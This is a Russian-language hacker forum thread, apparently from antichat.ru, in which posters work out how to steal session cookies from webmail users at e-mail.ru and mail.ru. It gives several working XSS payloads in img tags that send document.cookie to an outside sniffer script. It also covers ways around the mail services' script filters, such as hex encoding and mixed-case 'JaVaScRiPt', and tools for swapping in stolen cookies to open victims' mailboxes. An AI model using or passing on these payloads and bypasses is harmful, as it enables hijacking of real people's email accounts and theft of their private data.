Фильтры на скрипты, теги, метасимволы.... Поэтому и не работает...=(

Почему ? раз работает, значит полезен

Почему? Чтото непонял, у тебя что куки скрипту не передаются

может быть не работает сам XSS в твоей почте:
<img src="javascript:">

Может браузер не поддерживает функц. Image().
попробуй по-порядку

но это точно не изза бесплатного хостигна. скорее всего фильтрование со стороны клиента

PinkPanther оказался прав - ява скрипты просто блокируются. Но это можно обойти, используя шестнадцатиричные значения символов вместо javascript. Проверял на e-mail.ru.

<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">

Снифер выдал QUERY=b=b, рефка как и полагается пришла. Получается, что на e-mail.ru нет кукисов, а только одни сессии ?

На mail.ru такое дело не прокатывает. При вложении в html-код везде добавляется "X", изменяется заголовок.

<xtitle>Непонятный заголовок</xtitle>
</xhead>
<xbody>
<IMG src=xjavascript:document.images[0].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>
</xbody>
</xhtml>

Да, с бесплатным хостом все в порядке ! Разницы вроде нет платный-бесплатный.

Надо думать дальше насчет куков. Видимо надо пробовать вложения с рисунками и flash.

http://forum.antichat.ru/showthread.php?p=43322
Здесь Майор писал рабочий на данный момент способ обхода фильтра для mail.ru.
В твоем случае это выглядит так:
<image src=JaVaScRiPt:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>

ты прав

Thank you Майор & Xattab !

Интересно, а кто-нибудь юзал прогу Minibrowser v2.20 для подстановки куков. Очень интересная прога ! За исключением того, что не хочет открывать папки на mail.ru. На рамблере без проблем.

В принципе и Opera рулит, но не очень удобно делать подстановку снифф-куки.